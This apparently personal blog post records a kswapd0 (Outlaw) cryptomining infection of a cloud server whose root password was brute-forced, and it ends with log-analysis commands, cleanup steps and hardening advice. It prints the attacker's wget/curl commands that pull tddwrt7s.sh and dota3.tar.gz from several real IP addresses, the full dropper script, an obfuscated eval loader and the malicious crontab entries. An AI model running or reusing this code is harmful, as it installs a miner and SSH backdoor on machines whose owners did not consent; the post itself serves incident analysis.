kswapd0挖矿病毒攻击记录

一、起因与病毒分析

1、起因

最近内网穿透服务以及自建的博客一直掉线，重启服务也不行，用 top 查看发现1个kswapd0进程占用了一整个核（机器是2C4G），遂查刚开始以为是使用swap分区与内存换页操作交换数据造成的，但是清理了缓存仍无果，最终发现被挖矿木马攻击了。

2、阿里云告警

登陆阿里云控制台，也告警了阿里云异地登陆了，云安全中心显示凭证窃取，把我root密码爆破了

2.1 恶意脚本代码执行1

sh -c ./tddwrt7s.sh "http://167.172.213.233/dota3.tar.gz" "http://5.161.227.142/dota3.tar.gz" "http://216.70.68.24/dota3.tar.gz" "http://104.131.132.54/dota3.tar.gz" "http://172.104.46.33/dota3.tar.gz" "http://37.139.10.109/dota3.tar.gz" "http://46.101.132.59/dota3.tar.gz" >.out 2>&1 3>&1

2.2 恶意脚本代码执行2

sh -c wget -q http://161.35.236.24/tddwrt7s.sh || curl -s -O -f http://161.35.236.24/tddwrt7s.sh 2>&1 3>&1

2.3恶意脚本代码执行3

2.4 恶意脚本代码执行4

/root/.configrc5/a/kswapd0

3、病毒简单分析

3.1 病毒的初始化

tddwrt7s.sh脚本内容，脚本主要是下载dota3的病毒文件，并运行初始化

#!/bin/bash
if [ -d "/tmp/.X2y1-unix/.rsync/c" ]; then
        cat /tmp/.X2y1-unix/.rsync/initall | bash 2>1&
        exit 0
else
        cd /tmp
        rm -rf .ssh
        rm -rf .mountfs
        rm -rf .X2*
        rm -rf .X3*
        rm -rf .X25-unix
        mkdir .X2y1-unix
        cd .X2y1-unix
        RANGE=6
        s=$RANDOM
        let "s %= $RANGE"
if [ $s == 0 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 15 ]s
                        curl -O -f $1 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $1
                fi
if [ $s == 1 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 5 ]s
                        curl -O -f $2 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $2
                fi
if [ $s == 2 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 25 ]s
                        curl -O -f $3 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $3
                fi
if [ $s == 3 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 10 ]s
                        curl -O -f $4 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $4
                fi
if [ $s == 4 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 30 ]s
                        curl -O -f $5 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $5
                fi
if [ $s == 5 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 15 ]s
                        curl -O -f $6 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $6
                fi
if [ $s == 6 ]; then
                        sleep $[ ( $RANDOM % 500 )  + 55 ]s
                        curl -O -f $7 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $7
                fi
        sleep 60s
        tar xvf dota3.tar.gz
        sleep 10s
#       rm -rf dota3.tar.gz
        cd .rsync
        cat /tmp/.X2y1-unix/.rsync/initall | bash 2>1&
fi
exit 0

可以发现首先是运行了/tmp/.X2y1-unix/.rsync/initall脚本，打开发现进行了shell混淆，最后eval命令会执行其后的参数作为Shell命令

z="
";qz=''\''{pr';Fz='& pw';fz=' tsm';Zz=' go>';CBz='{pri';Ez=' ~ &';XBz='p -v';Yz='l -9';Vz='tdd.';wBz='" ];';DCz='2 | ';Az='slee';qBz='p 10';SBz='-9 l';yBz='n';UBz='nux';dz='> .o';nz='-v g';iz='`ps ';Gz='d)';gz='kill';pz='awk ';jBz=' '\''{p';Dz='$(cd';kBz='rint';gBz='grep';oz='rep|';lz='un|g';cBz='t $1';kz='ep r';nBz='cat ';vz='ep g';VBz='ep x';hz=' -9 ';Cz='dir=';RBz='mrig';bBz='prin';GBz='sm|g';HBz='chat';Bz='p 1';Lz='E';CCz='else';xz='ep -';OBz='kr -';lBz=' $1}';Xz='pkil';ABz='ep|a';ZBz='p|aw';tz='`> .';hBz=' -v ';KBz='~/.c';jz='x|gr';pBz=' | s';eBz='ep l';FBz='ep t';fBz='nux|';vBz='grc5';Uz='.x*';Sz='nu.*';LBz='onfi';mBz=''\''`';oBz='init';Tz='.F*';uz='out';ez='ut';aBz='k '\''{';wz='o|gr';Rz='h';yz='v gr';IBz='tr -';cz=' run';WBz='|gre';Wz='sh';rBz='if [';Nz='dev/';ACz='exit';iBz='|awk';Oz='shm/';Jz='tmp/';BCz=' 0';TBz='d-li';Hz='rm -';bz='t';Mz='E*';tBz='"$di';JBz='iaR ';dBz='}'\''`';PBz='all ';BBz='wk '\''';mz='rep ';NBz='lock';ECz='fi';Qz='nu.s';DBz='nt $';az=' .ou';rz='int ';uBz='r/.c';sz='$1}'\''';Iz='rf /';EBz='1}'\''`';xBz=' the';QBz='-9 x';YBz=' gre';MBz='grc*';Kz='.FIL';sBz=' -d ';Pz='var/';
eval "$Az$Bz$z$Cz$Dz$Ez$Fz$Gz$z$Hz$Iz$Jz$Kz$Lz$z$Hz$Iz$Jz$Kz$Mz$z$Hz$Iz$Nz$Oz$Kz$Mz$z$Hz$Iz$Nz$Oz$Kz$Lz$z$Hz$Iz$Pz$Jz$Kz$Lz$z$Hz$Iz$Pz$Jz$Kz$Mz$z$Hz$Iz$Jz$Qz$Rz$z$Hz$Iz$Jz$Sz$z$Az$Bz$z$Hz$Iz$Nz$Oz$Qz$Rz$z$Hz$Iz$Nz$Oz$Sz$z$Hz$Iz$Jz$Tz$z$Hz$Iz$Jz$Uz$z$Hz$Iz$Jz$Vz$Wz$z$Xz$Yz$Zz$az$bz$z$Xz$Yz$cz$dz$ez$z$Xz$Yz$fz$dz$ez$z$gz$hz$iz$jz$kz$lz$mz$nz$oz$pz$qz$rz$sz$tz$uz$z$gz$hz$iz$jz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$dz$ez$z$gz$hz$iz$jz$FBz$GBz$mz$nz$oz$pz$qz$rz$sz$tz$uz$z$HBz$IBz$JBz$KBz$LBz$MBz$z$NBz$OBz$JBz$KBz$LBz$MBz$z$gz$PBz$QBz$RBz$z$gz$PBz$SBz$TBz$UBz$z$Az$Bz$z$gz$hz$iz$jz$VBz$RBz$WBz$XBz$YBz$ZBz$aBz$bBz$cBz$dBz$z$gz$hz$iz$jz$eBz$TBz$fBz$gBz$hBz$gBz$iBz$jBz$kBz$lBz$mBz$z$nBz$oBz$pBz$Rz$z$Az$qBz$z$rBz$sBz$tBz$uBz$LBz$vBz$wBz$xBz$yBz$z$ACz$BCz$z$CCz$z$nBz$oBz$DCz$Wz$z$ECz$z$ACz$BCz"

我们首先进行解密，利用bash的调试模式即可bash -x xxx.sh，注意这是追踪模式，命令还是会运行，这里主要就是病毒的初始化运行，将一些服务暂停，缓存文件进行删除。后面就是几个脚本的定时执行，加入公钥，修改定时任务，开始挖矿

3.2 病毒本体执行

首先看了一下.ssh，把我的.ssh删除了，加入了它的公钥。然后看一下定时任务，哦吼，定时任务被修改了

crontab -l 

5 6 * * 0 /root/.configrc5/a/upd>/dev/null 2>&1
@reboot /root/.configrc5/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.configrc5/b/sync>/dev/null 2>&1
@reboot /root/.configrc5/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X2y1-unix/.rsync/c/aptitude>/dev/null 2>&1

从定时任务可以看出，主要是两个文件目录，一个是/root/.configrc5，还有一个是/tmp/.X2y1-unix（都是隐藏目录，很狡猾），注意还有一个/tmp/up.txt文件，这就是被爆破的root账号密码

# /root/.configrc5目录结构，病毒所在目录
├── a
│   ├── a
│   ├── bash.pid
│   ├── cert_key.pem
│   ├── cert.pem
│   ├── dir.dir
│   ├── init0
│   ├── kswapd0
│   ├── run
│   ├── stop
│   └── upd
├── b
│   ├── a
│   ├── dir.dir
│   ├── run
│   ├── stop
│   └── sync
├── cron.d
└── dir2.dir


# /tmp/.X2y1-unix/.rsync目录结构
├── 1
├── a
│   ├── a
│   ├── init0
│   ├── kswapd0
│   ├── run
│   └── stop
├── b
│   ├── a
│   ├── run
│   └── stop
├── c
│   ├── aptitude
│   ├── blitz
│   ├── blitz32
│   ├── blitz64
│   ├── dir.dir
│   ├── go
│   ├── n
│   ├── run
│   ├── start
│   ├── stop
│   └── v
├── dir.dir
├── init
├── init0
├── init2
└── initall


/root/.configrc/*      #病毒所在目录
/root/.ssh/          #病毒公钥
/tmp/.X2y1-unix/.rsync/*    #病毒运行缓存文件
/tmp/.X2y1-unix/dota3.tar.gz  #病毒压缩包
/root/.configrc5/a/kswapd0    #病毒主程序

然后就是a.kswapd0和c.blitiz64 两个执行程序，执行程序加入了混淆加密。b.run 是一段perl脚本，可以base64解密。具体的文件代码可以参考，有兴趣的可以研究一下。下载地址

4、总结

Outlaw病毒通过SSH攻击，访问目标系统并下载带有shell脚本、挖矿木马、后门木马的TAR压缩包文件dota3.tar.gz。解压后的文件目录可以看到，根目录rsync下存放初始化脚本，a目录下存放shellbot后门，b目录下存放挖矿木马，c目录下存放SSH攻击程序。

# 常用的日志分析技巧
# 定位有多少IP在爆破主机的root帐号：
grep "Failed password for root" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr | more
# 定位有哪些IP在爆破：
grep "Failed password" /var/log/auth.log|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c
# 爆破用户名字典是什么？
grep "Failed password" /var/log/auth.log|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr
 
# 登录成功的IP有哪些：
grep "Accepted " /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr | more
# 登录成功的日期、用户名、IP：
grep "Accepted " /var/log/auth.log | awk '{print $1,$2,$3,$9,$11}' 

二、ubuntu自救指南

1、病毒清理

1、top + kill -9 首先停止可疑进程

2、清理定时任务crontab -e

3、删除相关后门ssh key内容，vim /root/.ssh/authorized_keys

4、删除/tmp目录下缓存文件（不同病毒可能不一样），rm -rf .X2y1-unix/

5、删除病毒目录和文件，rm -rf /root/.configrc5

6、（其他暂时没发现后门，不过我发现病毒给的停止删除命令挺好使的）

2、如何防御

1、修改我们的账号密码，加强复杂度，不要使用口令

2、公有云添加白名单策略，业务端口只允许公司出口IP访问

---

https://blog.csdn.net/subfate/article/details/106546646

https://www.cnblogs.com/autopwn/p/17355657.html